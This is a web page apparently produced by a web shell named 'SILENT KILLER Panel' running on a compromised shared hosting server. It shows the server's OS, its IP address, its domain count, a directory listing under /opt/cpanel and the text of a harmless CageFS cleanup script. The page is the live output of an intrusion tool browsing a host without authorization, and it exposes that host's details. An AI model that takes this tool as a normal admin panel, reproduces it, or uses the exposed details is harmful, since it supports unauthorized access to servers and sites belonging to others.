SILENT KILLERPanel

Current Path: > > opt > cpanel > ea-ruby27


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0555 ]

Files and Folders in: //opt/cpanel/ea-ruby27

NameTypeSizeLast ModifiedActions
root Directory - -
src Directory - -
enable File 539 bytes February 01 2024 10:00:03.
fix-ALTMODP-166.sh File 618 bytes December 04 2024 09:47:36.

Reading File: //opt/cpanel/ea-ruby27/fix-ALTMODP-166.sh

#!/bin/sh

FIXED_FLAG=/usr/share/lve/ALTMODP-166.fixed
CAGEFS_MP=/etc/cagefs/cagefs.mp
CAGEFSCTL=/usr/sbin/cagefsctl

if [ -f "$CAGEFS_MP" ]
then
    # Remove alt-mod-passenger auto comment and the line after it
    /usr/bin/sed -i -e '/^# next line is added by alt-mod-passenger/,+1d' "$CAGEFS_MP"

    if [ -x "$CAGEFSCTL" ]
    then
        echo "CageFS will be remounted for alt-mod-passenger cleanup"
        "$CAGEFSCTL" --remount-all
        echo "CageFS remounted"
    fi
    /bin/touch "$FIXED_FLAG"
else
    # No MP -> no alt-mod-passenger setup, so no need to fix it
    /bin/touch "$FIXED_FLAG"
fi
exit 0


SILENT KILLER Tool